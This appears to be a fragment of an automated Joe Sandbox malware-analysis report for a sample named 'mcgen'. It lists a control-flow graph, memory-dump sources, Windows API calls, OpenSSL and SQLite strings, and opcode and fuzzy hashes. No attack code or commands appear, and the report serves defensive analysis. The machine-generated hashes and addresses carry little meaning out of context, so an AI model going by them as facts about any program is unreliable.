                                                                                                                                                                                                                                                                    control_flow_graph 1332 7ffd940dd9f0-7ffd940dda1b 1333 7ffd940dda6a-7ffd940dda8e 1332->1333 1334 7ffd940dda1d-7ffd940dda31 1332->1334 1335 7ffd940dda93-7ffd940ddab7 ReadFile 1333->1335 1336 7ffd940dda53-7ffd940dda67 00007FFDAC063010 1334->1336 1337 7ffd940dda33 00007FFDAC063010 1334->1337 1338 7ffd940ddb29-7ffd940ddb2b 1335->1338 1339 7ffd940ddab9-7ffd940ddac2 1335->1339 1336->1333 1340 7ffd940dda38 1337->1340 1342 7ffd940ddb59-7ffd940ddb62 1338->1342 1343 7ffd940ddb2d-7ffd940ddb54 call 7ffd940d9350 1338->1343 1339->1338 1347 7ffd940ddac4-7ffd940ddad2 1339->1347 1341 7ffd940dda3a-7ffd940dda52 1340->1341 1342->1340 1346 7ffd940ddb68-7ffd940ddb7d call 7ffd9420382c 1342->1346 1343->1342 1346->1341 1351 7ffd940ddad4-7ffd940ddada 1347->1351 1352 7ffd940ddb03-7ffd940ddb24 call 7ffd940dd820 1347->1352 1354 7ffd940ddadc-7ffd940ddae0 1351->1354 1355 7ffd940ddae2-7ffd940ddae5 1351->1355 1352->1341 1354->1355 1357 7ffd940ddaef-7ffd940ddb01 1354->1357 1355->1357 1358 7ffd940ddae7-7ffd940ddaed 1355->1358 1357->1335 1358->1352 1358->1357
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010$FileRead
                                                                                                                                                                                                                                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                                    • API String ID: 2531077403-1843600136
                                                                                                                                                                                                                                                                    • Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                                                    • Instruction ID: 0dd4f34eaa57d3081edc4793f0a7f32dfc9ec21332bcd222bdc9db624c7e8b94
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C413622B1C74681E2309F95E8E06A977A5FF96B84F50C132FA4C47696DF3DE54AC340
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                                                    • Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                                                    • Instruction ID: fb821f619991b0e42f19b336493aa1561c839daf379281cf6342a718bf78a84d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A18B21B0EE8682FB50BF65D4607B92293AF44BC8F544135DE4D2BB9ADF3EE4458318
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                                                    • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                                    • Instruction ID: 82423116829aba53502022394cf1646a0439bc73bba7d0535c75afc75ab2a507
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62A18025B0EE42C1FB60BE25D8713BD2296EF41B45F184032D94D6A7DBCE3EE8818359
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                                                    • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                                    • Instruction ID: ebe0d70dfd62fa681f6d0a35b3134f483dd6179b65059c4d5378ea7ce9e33f44
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA419D62B0EE8283F750AF59D4647B933A2FB80B84F244135DA1D1BB96DF7EE4518308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                    • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction ID: e07bbe44bbcd619e33119239165f330ff4d5713537b61c95606d1ff58c628ffb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02318CA0E0C27341FA24AF3ED4213B92799AF423A7F444438EB5DC72D7DE2CA445C291
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                    • Instruction ID: 1c19b1c5e198bacb9f7f8c0ebac55ad066965f868dc763c4b3034f1f8a7cbc30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751C663A092C146E6689E6D940077A7299EF46BB6F184635FF6D877C5CF3CD4018601
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction ID: 3fa5782cfb2183db67c02a04b7434ffaaeaabc0e7720b4c91186d2d3ad08411e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D11C171A18A8181DA208F29A8142697765BB85BF5F544331FF7D8B7E9CE7CD0158700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC36
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction ID: 84d3a478d89b2d190fce0a413e4f0ca67f1d0c7232cecda021be7dfd1f122380
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2216F21B1C6C242FAA49F699590379368E9F847B6F094239FB2EC73D5CE7CE4458301
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                                                    • Instruction ID: 67fabbbfb9de933cb546baee5dd33cc0a6eaee0df5fd85bead2c642512795a98
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B316F31E2869285E7515F6D884137C3658AB81BB7F514239FF6D833D2CEBCE4418B11
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction ID: a16b878d8f9bc7bad4a9867ae9082fb04db46b2abedc329dc4e18f4e0ccbf167
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8216F72A1CA8686DB718F6CD48137976A4EB84BB5F244234EB9DC76D9DF3DD4008B01
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction ID: 7b44969c58d0839089edb9f04bc29d8a04f9cda4c76d102c320c4d10a5f83206
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4101C422A0878140EA04DF5A9901679B699BF86FF1F2C8631FF5C97BD6CE3CE1018300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                    • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                                    • Instruction ID: 0ec08deccdf4ccb3055487328bf3687d18178aa263743b2f944c539a55c21c68
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85219232B0CF8187D3549B22A55066AB2A6FB84BC4F544135EB8C13F96CF3DD451CB08
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF6B9F2B39A,?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA), ref: 00007FF6B9F2EC5D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction ID: 19ce7a14e54629dc8b9b3f2c9fd7ab1253ea19c66de66bb27eac62e54ef95a07
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37F06254B4968781FE595EAD54613B5278E5F84BA2F6C4430EF0DC73D1DD7CE480C211
                                                                                                                                                                                                                                                                    Strings
